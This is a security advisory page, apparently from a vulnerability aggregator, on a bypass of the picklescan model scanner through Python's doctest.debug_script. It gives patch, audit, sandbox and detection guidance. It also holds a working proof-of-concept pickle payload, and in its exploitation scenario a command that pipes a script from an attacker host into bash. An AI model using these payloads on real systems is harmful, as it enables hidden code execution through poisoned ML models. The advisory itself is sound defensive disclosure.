GHSA-fqq6-7vqf-w3fg: picklescan: detection bypass allows undetected RCE in ML models

GHSA-fqq6-7vqf-w3fg MEDIUM
Published August 26, 2025
CISO Take

picklescan, the standard tool for vetting PyTorch and ML model files before loading, can be fully bypassed using Python's built-in doctest.debug_script function — meaning malicious pickle files pass as clean. Any pipeline gating model ingestion on picklescan is operating with a false security guarantee. Upgrade to picklescan 0.0.30 immediately and audit all models scanned with older versions as potentially compromised.

Risk Assessment

High operational risk for organizations using picklescan as a security control, despite the Medium severity rating. The vulnerability completely defeats a dedicated security gate rather than exploiting an application weakness. A public PoC exists, and exploitation is trivial once the bypass is known; the blast radius includes any team downloading models from external registries (Hugging Face, PyPI, internal hubs). The false confidence created by a 'clean' picklescan result is arguably more dangerous than having no scanner at all.

Affected Systems

Package      Ecosystem   Vulnerable Range   Patched
picklescan   pip         < 0.0.30           0.0.30

Do you use picklescan below 0.0.30? You're affected.

Severity & Risk

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to 0.0.30+ immediately (pip install --upgrade picklescan).

  2. AUDIT

    Treat any model file scanned with picklescan < 0.0.30 as unverified — rescan or quarantine (see the audit sketch after this list).

  3. DEFENSE-IN-DEPTH

    Never load pickle files from untrusted sources regardless of scanner verdict; prefer safetensors format for model weights.

  4. SANDBOX

    Execute model loading in isolated environments (containers, VMs) with no network access and minimal OS privileges.

  5. DETECTION

    Monitor for unexpected process spawning (whoami, id, curl, wget) from Python interpreter processes loading ML models (see the monitoring sketch after this list).

  6. POLICY

    Add picklescan version pinning to MLOps pipeline requirements and enforce minimum version 0.0.30 in pre-commit hooks or CI gates.
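
The patch and audit steps can be scripted together. Below is a minimal sketch: it refuses to run on an unpatched scanner, then rescans a directory of model files and quarantines anything flagged. The directory layout and file extensions are illustrative assumptions, as is the exact shape of picklescan's Python API (scan_file_path and its issues_count field); verify both against the version you install.

```
import shutil
from importlib.metadata import version
from pathlib import Path

from packaging.version import Version
from picklescan.scanner import scan_file_path

# Refuse to audit with a scanner that is itself bypassable.
assert Version(version("picklescan")) >= Version("0.0.30"), "upgrade picklescan first"

MODEL_DIR = Path("models")       # illustrative: where downloaded models live
QUARANTINE = Path("quarantine")  # illustrative: holding area for flagged files
QUARANTINE.mkdir(exist_ok=True)

for path in MODEL_DIR.rglob("*"):
    if path.suffix not in {".pkl", ".pt", ".bin", ".ckpt"}:
        continue
    result = scan_file_path(str(path))
    if result.issues_count > 0:
        print(f"FLAGGED: {path} ({result.issues_count} issue(s))")
        shutil.move(str(path), QUARANTINE / path.name)
    else:
        print(f"clean: {path}")
```

A clean rescan is still not proof of safety; it only restores the guarantee picklescan is designed to give.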
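For the detection step, the signal to look for is a shell utility whose parent is a Python interpreter. A minimal polling sketch using the third-party psutil library (an assumption; an EDR, auditd, or eBPF rule covering the same parent/child pattern is a better production fit):

```
import time

import psutil  # third-party: pip install psutil

SUSPICIOUS = {"sh", "bash", "curl", "wget", "whoami", "id"}

def scan_children():
    """Flag suspicious processes spawned by a Python interpreter."""
    for proc in psutil.process_iter(["pid", "name"]):
        try:
            if proc.info["name"] not in SUSPICIOUS:
                continue
            parent = proc.parent()
            if parent and parent.name().startswith("python"):
                print(f"ALERT: {proc.info['name']} (pid {proc.info['pid']}) "
                      f"spawned by {parent.name()} (pid {parent.pid})")
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue

while True:
    scan_children()
    time.sleep(2)
```

Polling misses short-lived processes, so treat this as a demonstration of the pattern rather than a complete control.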

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 15 (Accuracy, robustness and cybersecurity); Art. 9 (Risk management system)
ISO 42001: 6.1.2 (AI risk assessment); 8.4 (AI system lifecycle — Acquisition and supply chain)
NIST AI RMF: GOVERN 6.1 (Organizational risk policies for AI supply chain); MANAGE 2.2 (Mechanisms to sustain oversight of deployed AI)
OWASP LLM Top 10: LLM03:2025 (Supply Chain Vulnerabilities)

Frequently Asked Questions

What is GHSA-fqq6-7vqf-w3fg?

picklescan, the standard tool for vetting PyTorch and ML model files before loading, can be fully bypassed using Python's built-in doctest.debug_script function — meaning malicious pickle files pass as clean. Any pipeline gating model ingestion on picklescan is operating with a false security guarantee. Upgrade to picklescan 0.0.30 immediately and audit all models scanned with older versions as potentially compromised.

Is GHSA-fqq6-7vqf-w3fg actively exploited?

No confirmed active exploitation of GHSA-fqq6-7vqf-w3fg has been reported, but organizations should still patch proactively.

How to fix GHSA-fqq6-7vqf-w3fg?

1. PATCH: Upgrade picklescan to 0.0.30+ immediately (pip install --upgrade picklescan).
2. AUDIT: Treat any model file scanned with picklescan < 0.0.30 as unverified — rescan or quarantine.
3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict; prefer safetensors format for model weights.
4. SANDBOX: Execute model loading in isolated environments (containers, VMs) with no network access and minimal OS privileges.
5. DETECTION: Monitor for unexpected process spawning (whoami, id, curl, wget) from Python interpreter processes loading ML models.
6. POLICY: Add picklescan version pinning to MLOps pipeline requirements and enforce minimum version 0.0.30 in pre-commit hooks or CI gates.

What systems are affected by GHSA-fqq6-7vqf-w3fg?

This vulnerability affects the following AI/ML architecture patterns: ML model loading pipelines, PyTorch model serving, Model hubs and registries, CI/CD pipelines with model validation, Training pipelines using pre-trained models.

What is the CVSS score for GHSA-fqq6-7vqf-w3fg?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

doctest.debug_script, a built-in Python standard-library function, can be used to execute code embedded in a pickle file without being flagged by picklescan.

### Details

The attack works in two steps. First, the attacker crafts the payload by returning a call to doctest.debug_script from the object's __reduce__ method. Then, when the victim scans the pickle file with the picklescan library and it detects no dangerous functions, the victim proceeds to pickle.load() the malicious file, resulting in remote code execution.

### PoC

```
from doctest import debug_script

class EvilDoctestDebugScript:
    def __reduce__(self):
        # debug_script(src, pm=True) -> exec(src, ...)
        return debug_script, ("__import__('os').system('whoami')", True)
```

### Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Credits

https://github.com/FredericDT
https://github.com/Qhaoduoyu
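
To verify the fix, you can pickle the PoC class with a harmless stand-in command and scan the result; picklescan inspects the file statically, so scanning it does not execute the payload (only pickle.load would). A minimal sketch, again assuming the scan_file_path API described above; run it only in a disposable environment and never load the resulting file:

```
import pickle
from doctest import debug_script

from picklescan.scanner import scan_file_path

class EvilDoctestDebugScript:
    def __reduce__(self):
        # Harmless stand-in for an attacker's payload
        return debug_script, ("print('pwned')", True)

with open("poc.pkl", "wb") as f:
    pickle.dump(EvilDoctestDebugScript(), f)

result = scan_file_path("poc.pkl")
# picklescan < 0.0.30 reports 0 issues here; 0.0.30+ should flag doctest.debug_script
print(f"issues found: {result.issues_count}")
```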

Exploitation Scenario

An adversary targets an organization that routinely downloads community PyTorch models. They craft a malicious .pkl file using the doctest.debug_script bypass — the __reduce__ method returns (debug_script, ('__import__("os").system("curl attacker.com/shell.sh | bash")', True)). The file is uploaded to a public model hub or distributed via a poisoned dependency. The victim's CI/CD pipeline runs picklescan, receives a clean verdict, and the pipeline calls torch.load() or pickle.load() on the file. The embedded payload executes with the permissions of the ML worker process — potentially giving the attacker shell access to training infrastructure, GPU servers, or data lakes containing proprietary training data.
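
The defense-in-depth recommendation is concrete in code. Two safer loading patterns: safetensors files contain raw tensors and execute nothing on load, and torch.load with weights_only=True (available since PyTorch 1.13, the default since 2.6) rejects non-allowlisted callables such as doctest.debug_script. A minimal sketch; the file names and model class are illustrative:

```
import torch
import torch.nn as nn
from safetensors.torch import load_file  # third-party: pip install safetensors

class TinyNet(nn.Module):  # illustrative stand-in for your architecture
    def __init__(self):
        super().__init__()
        self.fc = nn.Linear(4, 2)

# Preferred: safetensors stores raw tensors, so loading executes no code.
state_dict = load_file("model.safetensors")

# If a pickle-based checkpoint is unavoidable, restrict the unpickler:
# weights_only=True rejects arbitrary globals, including the
# doctest.debug_script callable used in this bypass.
state_dict = torch.load("model.bin", weights_only=True)

model = TinyNet()
model.load_state_dict(state_dict)
```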

Timeline

Published: August 26, 2025
Last Modified: August 26, 2025
First Seen: March 24, 2026
